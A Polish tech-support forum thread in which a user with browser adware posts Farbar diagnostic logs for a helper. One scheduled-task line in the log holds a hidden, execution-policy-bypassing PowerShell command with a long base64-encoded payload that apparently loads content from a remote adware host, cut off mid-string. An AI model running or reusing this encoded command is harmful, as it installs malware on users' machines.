x-kom hosting

Zasyfiony komputer wirusami

aQuaK1337
utworzono
utworzono

Witam, od paru dni obrykam się z problemem reklam (mam adblocka jednak nie pomaga), gdy klikam myszką gdzieś na ekranie przeglądarki otwierają mi się nowe strony jakies konkursy itp. Wygląda to mniej więcej tak

http://screenshot.sh/m8Us0WrWVlCT1

http://screenshot.sh/m8Us0WrWVlCT1

Skanowałem już kompa programami typu: AVG, ESET, AdwCleaner,Malware. Żaden nie zadziałał.

Proszę o pomoc.

Matematyk0
komentarz
komentarz

Włącz dodatki/rozszerzenia do przeglądarki, znajdź pasożyta i albo wyłącz, albo odinstaluj.

aQuaK1337
komentarz
komentarz

A co dają te logi ?

Twój_Anioł_Stróż
komentarz
komentarz

A co dają te logi ?

na ich podstawie mogę określić, czy jest infekcja, czy nie.

.

aQuaK1337
komentarz
komentarz

Wirusy mam napewno, ja chce je po prostu usunąć

Twój_Anioł_Stróż
komentarz
komentarz

Wirusy mam napewno, ja chce je po prostu usunąć

bez logów nie mam żadnej możliwości Ci pomóc.

.

aQuaK1337
komentarz
komentarz

Farbar Service Scanner Version: 03-01-2016
Ran by Rafał (administrator) on 12-01-2016 at 17:55:57
Running from "C:\Users\Rafał\Desktop\pulpit"
Microsoft Windows 8.1 Pro  (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Attempt to access Google IP returned error. Google IP is unreachable
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============
mpsdrv Service is not running. Checking service configuration:
The start type of mpsdrv service is OK.
The ImagePath of mpsdrv service is OK.

MpsSvc Service is not running. Checking service configuration:
The start type of MpsSvc service is set to Demand. The default start type is Auto.
The ImagePath of MpsSvc service is OK.
The ServiceDll of MpsSvc service is OK.


Firewall Disabled Policy:
==================
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=DWORD:0


System Restore:
============

System Restore Policy:
========================


Action Center:
============


Windows Update:
============

Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.
The ImagePath of WinDefend: ""%ProgramFiles%\Windows Defender\MsMpEng.exe"".


Windows Defender Disabled Policy:
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1


Other Services:
==============


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****

Twój_Anioł_Stróż
komentarz
komentarz (edytowane)

Chodziło mi o logi z FRST, a nie z FSS

.

aQuaK1337
komentarz
komentarz

Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja:10-01-2015 01
Uruchomiony przez Rafał (2016-01-14 18:11:00)
Uruchomiony z C:\Users\Rafał\Downloads
Windows 8.1 Pro (X64) (2015-12-30 14:34:41)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-3176993754-4223996750-584129700-500 - Administrator - Disabled)
Gość (S-1-5-21-3176993754-4223996750-584129700-501 - Limited - Disabled)
Rafał (S-1-5-21-3176993754-4223996750-584129700-1001 - Administrator - Enabled) => C:\Users\Rafał

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG AntiVirus Free Edition (Enabled - Out of date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition (Enabled - Out of date) {F620D48B-1497-73CC-F290-58052563BEAE}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

µTorrent (HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Adobe Reader 9.5.0 - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-A95000000001}) (Version: 9.5.0 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\...\{ED79BF8A-BDEB-D95B-FC6C-E6DB27DB9714}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
AVG (HKLM\...\AvgZen) (Version: 1.31.1.48846 - AVG Technologies)
AVG (Version: 16.31.7356 - AVG Technologies) Hidden
AVG 2016 (Version: 16.0.4489 - AVG Technologies) Hidden
AVG Protection (HKLM\...\AVG) (Version: 2016.31.7356 - AVG Technologies)
AVG Zen (Version: 1.31.9 - AVG Technologies) Hidden
Blades of Time - Limited Edition (HKLM-x32\...\Blades of Time - Limited Edition_is1) (Version:  - )
Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
Classic Shell (HKLM\...\{D4B3454F-7529-4F5F-851D-2C36933F7D64}) (Version: 4.2.5 - IvoSoft)
Convert DOC to PDF For Word 3.50 (HKLM-x32\...\Convert DOC to PDF For Word_is1) (Version:  - 8848Soft, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Crysis® 2 (HKLM-x32\...\{6033673D-2530-4587-8AD0-EB059FC263F9}) (Version: 1.0.0.0 - Electronic Arts)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.2.0.0114 - Disc Soft Ltd)
FIFA 16 (HKLM-x32\...\{28FA2805-7992-4A28-844B-040C57204718}) (Version: 1.4.64673.4 - Electronic Arts)
Flat Out 2 v1.0 (HKLM-x32\...\Flat Out 2_is1) (Version:  - Empire / Áóęŕ)
FMW 1 (Version: 1.42.1 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
HashCheck Shell Extension (x86-32) (HKLM-x32\...\HashCheck Shell Extension) (Version: 2.1.11.1 - Kai Liu)
HashCheck Shell Extension (x86-64) (HKLM\...\HashCheck Shell Extension) (Version: 2.1.11.1 - Kai Liu)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.20.1337 - Intel Corporation)
Intel(R) Small Business Advantage (HKLM-x32\...\{6A6D86CD-B004-46b7-8951-7BB75A776F8C}) (Version: 1.1.27.5565 - Intel(R) Corporation)
Intel(R) Smart Connect Technology 3.0 x64 (HKLM\...\{B2630BA9-0AFD-4BF4-98F3-29BC2143C834}) (Version: 3.0.41.1571 - Intel)
Intel(R) Update Manager (x32 Version: 1.0.0.34813 - Intel Corporation) Hidden
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
Kels' Win7 CPL PacK! (HKLM\...\CPL Pack) (Version: 5.2 - Kelsenellenelvian EverDawn)
League of Legends (HKLM-x32\...\{92606477-9366-4D3B-8AE3-6BE4B29727AB}) (Version: 1.3 - Riot Games)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 43.0.4 (x86 pl) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 pl)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4 - Mozilla)
MSI Afterburner 2.2.2 (HKLM-x32\...\Afterburner) (Version: 2.2.2 - MSI Co., LTD)
Nero 2016 (HKLM-x32\...\{049045D5-0C46-4E78-A83F-83E993D91A7F}) (Version: 17.0.02300 - Nero AG)
Nero Info (HKLM-x32\...\{F030BFE8-8476-4C08-A553-233DE80A2BE1}) (Version: 16.0.2000 - Nero AG)
Opera Stable 34.0.2036.41 (HKLM-x32\...\Opera 34.0.2036.41) (Version: 34.0.2036.41 - Opera Software)
Origin (HKLM-x32\...\Origin) (Version: 9.11.2.10120 - Electronic Arts, Inc.)
Prerequisite installer (x32 Version: 17.0.0002 - Nero AG) Hidden
Razer Cortex (HKLM-x32\...\Razer Cortex_is1) (Version: 6.4.6.10930 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6738 - Realtek Semiconductor Corp.)
ScreenShooter5 (HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\ScreenShooter5) (Version: 5.0 - )
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Software Informer 1.4.1303.0 (HKLM\...\Software Informer_is1) (Version:  - Informer Technologies, Inc.)
Stashimi Stub Installer (x32 Version: 18.001.1 - Nero AG) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SteelSeries Engine 3.6.2 (HKLM\...\SteelSeries Engine 3) (Version: 3.6.2 - SteelSeries ApS)
TakeOwnershipEx (HKLM-x32\...\TakeOwnershipEx) (Version: 1.2.0.1 - hxxp://winaero.com)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TmNationsForever (HKLM-x32\...\TmNationsForever_is1) (Version:  - Nadeo)
UltraUXThemePatcher (HKLM-x32\...\UltraUXThemePatcher) (Version: 2.2.0.0 - Manuel Hoefs (Zottel))
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Viking - Battle for Asgard (HKLM-x32\...\Viking - Battle for Asgard_is1) (Version:  - )
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)


==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {37E283AF-A152-4ACF-BA11-95942E615090} - System32\Tasks\SoftwareInformerService => C:\Program Files\Software Informer\softinfo.exe [2015-06-26] (Informer Technologies, Inc.)
Task: {3D130900-BA53-43C7-BDD8-8F2306411FAD} - \AutoPico Daily Restart -> Brak pliku <==== UWAGA
Task: {429BE338-E175-425D-99DA-C7EBE9F2259A} - System32\Tasks\Opera scheduled Autoupdate 1451488161 => C:\Program Files (x86)\Opera\launcher.exe [2015-12-15] (Opera Software)
Task: {4F6B1ED0-DE98-4C54-BA87-6C627BA6020E} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd)
Task: {69393118-CD84-4C39-AB41-148AF4A58A34} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-30] (Google Inc.)
Task: {7AC812F8-AC4F-4D30-AF8F-CB34AF51F94D} - System32\Tasks\{966DF9F5-18FB-4D4D-9714-2F1FAAA6473D} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.17.0.105&amp;LastError=12007
Task: {80A91B57-A23B-4EAB-91BA-21CC4536BFD4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {A6FA8D57-2A41-4229-9834-8D8FF8EBF158} - System32\Tasks\Nero\Nero Info => C:\Program Files (x86)\Common Files\Nero\Nero Info\NeroInfo.exe [2015-06-04] (Nero AG)
Task: {AAA89DAF-1B4F-447D-AF21-7F0559AC9962} - \Microsoft\Windows\Windows Media Sharing\UpdateLibrary -> Brak pliku <==== UWAGA
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {E3769789-2BF0-4AAE-8D99-3EDAA2BCBA48} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-30] (Google Inc.)
Task: {F7EAA3E0-64EF-4A85-B97F-1B31AB700F21} - System32\Tasks\{0D7D0947-0A08-0E04-0511-08040D7E1109} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAaQBuAGgAbwBvAG0AZQAuAGkAbgBmAG8ALwB1AC8APwBhAD0AcgBOADMAbwAzAHgAcQBzAFkASQBXAGYARQA2AG0AQwBoAE4AWgBrAG8AUwBnAGEAeQBhAEYAdAB5AEEAWgAyAEkANgBnADMAbABHAGEASABiAHEANQBoAGcAegBYADkAUgBrAE8ANABJAE8AMwBOADUAYQBUAFYATABOAGEAaQAwAGMAQgBKAGcAcQBsAGEAVgA3AEoARgBzAEsAcgA2AFYAeQBkAHUAbQBOADQAdABzAG4AdwBDAE8ASgBvAHUAcQBuAHoASgBrAEgARwBPAEcAcQBKAGsAMgBIAGQASwB6AEoAVgBUAEwAVwB1AHAAQwBOAEwAagBUAHEAeQBnAGMAOQBEAEgAUQBEAEIAbgAzAHUATwBTAHMAXwA1ADMAXwBqAFYAawBVADUAcgBXAEQAMAB4ADEAcgBxADQAOQB0AFYATwBQAFYARwA4AC0AaQBhAFYATQB3AHQANABTAGsATAAzAEEAbgA2AE8AZAB6AHIAbwBzAFEANQBUAHIAdAA2AHIAcgBDAEEAMgBOAFMAcAB5AHoANgBPAHUAVgBJAFEAVgB2AEYAVQBnAHMAVQBpAHkAeABhAEYAMwA0AHcAbAB6AEEAcQBrAG0AdABVAHMASwBlAGwAMwB4ADgAUQA0ADQAWgBkADMAUQAwAHUAZQBYAE0ANwBuAG4ARAA5AG0AeABIAF8ALQBpADcAbQBGAGUAUgB2AGkATABuADEATgBwAE8AUgB6ADAAUABJAG0AWABXAG4AYQBqADUANAByAHMAXwBrADkAcQBkAE0AaABfAEkAZwAzAHAAWgBBAG8AUgBNAFYAQgBBAG0AbgA4AGkATQAxADIAQgA3ADEASwB3AE8AaQBFAEoAWgBOAE8AegBEAEUAXwBCAHIAYgAyAE8AeABlAGEAMABFAGgANgAwAGsARgBHAEoANABjAE8AcgBGAFcAUwBWAHkAbQBaAEMAVgB4AEkATgBYAGwARwBBAEcAYwBYAHYANQBxAEoAegBFAHAAcABoAE0ARQBfAFcAVAA4AFoAZwBkAGkAeQBhAHQANgB6AE0AMQA2AGsAdwA2AGcAaABOAHQAWQB1AEIAegBEAF8AUAAyAFYANgBwAHYAMgBKAHUAbQBpADkAcwBYAFEATAA1AHMAdQB1AEYASABNAHIAYwBVAE8AMgBUADAAcgBzAHMAYwB5AGoAdgA4AEgAbwBOAHYASgB0AEYAbgBkAFEAOQBuADIAUwBOAG8AeQB5AGUAbQBsAEgAZABxAFUANwBLAHoAVwBxAFoAOQBwADEAOQB5AEwAVABmAFoAegBXAFgAWABtADkASwB0AFcAaQBFAHoATABrAE0ATgBEAFAARQBUAHUAWAB2AGUAUAA2AGIAbwBfAGkAVAB4AHoAeQBuAFIAVgBDAGUARgBwAFMAcAB1AG8AMgBvAGIAOABXAFEASwBCAEkAMAB4ADQAUAAtAEMAcABKAEoAOQBFAHcANwBNAGYAZQBIAG4AVABfAEsAXwA3AG4AVQB4AHgAOQB5AFQAcwBrAFkAegBQAHgAUABhAGQAQQBqAGgAUAA1AHUAVQBuADcAZQBZAFEARwB0AEsANwBEAG0AYQBSAEkARQBVADgAYQBJAHMANABkAEMAMQBGAGwAcAAyAFAAZwBDAEEAcAAzADQAMQBtAGMAeQBiADMAWgA2AG0ANQBMAEYAYgBZAFcAXwBCAEsATABLAGIATAA0AGgATQBsAEUAawA4AGsASABiAFcASQBDAGYAQgBaAEkAZABsAGgAeQBRADQAOAB0AFEAbQBHAEQAcQBXAEcASQBQAEQATgBCAEEASQAwAEkAZwBZAE8AdgBuAEkASQBqAE0AWgB2AGYAbQBFAHoANwBtADkAegA0AFEASABEAFoAMgBMAEkATABUAGsARQA0AE0AYgBpAGcAcABWADQAdABRAE8ARQA2AFMAWgBYAE0AOQBpAHoASwB0ADYAdABTAEMAVABvAHAAegA0AFoAWABGAGQAeQB1AGQAdwAzAHEAYQBpAFgAQgBjADcAdQBKAFcAMwBZAEgALQBPAFkAWQBIAG0AagA0ADAASgBkAGkARgBBAFQAWABRADUAQwBIAFUAZwBYAHkAWQBHAHAAZwA0AEgAegBRAHgAeABqAEUAeABtAG0AYgBCAG8AQwB5AHkALQBQAEUARwB6AHgAMgAzAGQAYgBfAFEASABpAGIAdgB3AFoAZABoAEkAdwB1ADAAdQBSAGoAZABmACYAYwA9AFAATwBaAEIAeABHAF8AZAA0ADkAUAA0AFgAXwBDAEYASAB6AEMAMwBmAG8AZQAzAEQAOABxAFAARgB4AHoAWgA2AGcAcQB4AGUAcgBQAGkANwBWAGIAcwAwAEwARAB3AEMAaABSAFoAbQBZADcAcABLAHQAbQBGAGkANAB5AGMAdwBIADkAawBoAHUANAB2ADgAdwBKAEEAagBWADMAeABxAE0AUABZADAATAA3AHgAVABYAEYAWQBtAHoAcwByAGMAYwB4AHkASQBqAEgARwBiAGsAegBCAG0AMwBmAFIAeAA5AGkAUwBuADgAVwB4AFMAeQA1AGIASwAzAC0ARgBZAFkARgBsAEwAYQA1AE8ASABaAEIAQQB1ADAAcwBvADcASABRADMAbgBrAE0AcABQADYATABPAEgAVgBjAEcAYgBwAEkAQgB0AE4ARgA3AEEAMwAtAEQARABBAGwAYgBKAGQAQQBmAHYAUQB6AG0AbgA1AG4AMQBzAHAAcwBNAGMAbQBjADIANgB1ADkAVwBFAGkAcQBTADYAUgBWAHAAaQBRADcALQA4AEcATgBjAEoAbABrADkAcgBUAEkAUgB5AGEAcABiAE8AcQA1AGUAMABnAHAANABvAFEAUwBUAHoANQBSAGcAYQBRADQAYQBVADkAUwBrAHoAWgBhAGkANwBuAGoAWgBhADEAQgBHAEUAbQAzAFgAZQBkAEUAXwB0AGYAVQA4AGwAdwBSAHIAcABvAHoAaQA3ADQAdgB5ADEAWAB2ADQATAB6AFMAWgB1AGoAcQBWAGMAcQBmAEIANgB4AEQAcwBQAGYAcQA0AHkAdQBtAGwAMwBfAGQAQwBaAEYAcgBCAGkATgAyAFkATwBwAHcAQgAzAEkAeQBOAGsAeAA1AHoARABWAE0AcgBCAGsAVQBrAEEAOQBoAFEAQwA5ADEATABIADUAVQBpAEYAYwB2AFoAOQA4AF8AdQBvAEwAXwA2AGgAaABNADAAdABtAEQAdQBNAEMAQwAwAEoAaABpAEQAUgBfAGEAQwBZAGIAegB4AFIARwBPAHgAcABKAFMAaQAyADMASABLAE0AegBpAGcAMABFAEUAcQBGAHMAdAByAHMANwBIADYAdQBpADcAbgBQAGQASwAzAFoAYgBQAGUAYwB1AHcAegBMAEcAMgBlADgAQwBuAHAAMQBBAHcAUABUADgARQByAEgAbgA2AHkAdwA0AEUAQQBDADEAUQBBAGUAMwBtAEYAMgB5AFMANAA2ADYAXwBrAEkAcgBIAHIALQBfADAAWQB3AGIAegB1AEcAagBjAEsAcwB1AEEASABvAEMAegBnAHgAUgBNAF8AOQBfAF8AcQBZAE0AdwBOAFcAWQBVAHkAaABpAFMAXwBJAEIAUgBWADIAbQBPAG8AYQA3AHAAZQBUAE8ANABOAGwASwBZAFkAcAAyAE8ANwBlAFAAbwBlAGEATABrAEUAagBOADAAXwBkAGMAeQBxAGoASwBzADUAeAB5AFQAYgBMAHoAMABQADUATgBKADMAUABTAGwAegBFADAASABJADYAeABWAFQAVgBlAFEAdABHAGgARQBkAGEAWQBhAFQAMwBrAGUAWQBVAFgAagBTAFAAQwBaAGEAVABRAHoAVABuAFAAVAB3ADIASgBYADcAVwBsAFUARQAxAFAAUgB3AE4AcABhAFkAaABlAHMAbwBTAGQANABoAFQAbABlAFoAdgBGAGcAbABnAGcASgB5ADgANgBVAG4AcgBFAFIAVwBMAFgARgBUAEwAeABZAHUATgAtAHEANwByAGkAUgA0AGkAVwBLAG0AdQBzAEYAUgBNAEMAawBoAEsAcwBMAGwAeABTAEwASAA1AGIAMABXAG8AOQBmADcAUAAxAGsAawBQAHEANwBaAGIAZgBuAG8AMABRAFAAeAA3AGYAawBHAG0AegBfAE0AQQBZAEYALQBqAGMAZgBhAGQANQB6ADgATQBzADEATAA3AEMAMQBfAEEAeQBTAHoAWAA3AHIAUQBNAFQATwBnAEoAOQA0AHoAVgBXAGIAUwA1AHMANQBVAHgAYQA1AFUAcQBiAGkARwBzAHAANABKAGcAMQA1AFAAdwA3AGoANgBLAHIARABPAEoAVwBLAGkAWABhAEEAdwBZAGUAcQBoAEYAMgBWAGoAZQB0ADMAcgBwAGsAQwA5ADIAaABoAFYAdgBjAFEAYwBYAG0AQwBSAEMAZgBKAFAAUgBVAFgAcABlAE4AdgA1AFIARQBBAC0AbwBMAEUAdQBWAFcATABiAE0AcwBUADIAYwA1AFMASABmAGYAUwBfAEoAcQBvADgAegB1AHgASQBlAGoAQQA4ADEARwA2AGsAVQA3AG0ARQBvAGkARQBrAEUAcQAwAHUAcABvAEgAXwBVADkAMAB0AGcATgB5AGkAQgBPADQANAA5AFcAUABLAEsAZQByAFoATQBoAGoAZgBvADQAUQBOAGQAaAAzAFcAdwA0AFcAVABmAFQAJgByAD0ANQA4ADcANQAzADQAMAAxADUAMAA1ADkANgA4ADUAMwA0ADIANgAiADsAJABzAHQAcwBrAD0AIgB7ADAARAA3AEQAMAA5ADQANwAtADAAQQAwADgALQAwAEUAMAA0AC0AMAA1ADEAMQAtADAAOAAwADQAMABEADcARQAxADEAMAA5AH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBMAE0ASgBMAFkATABWAEoAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBv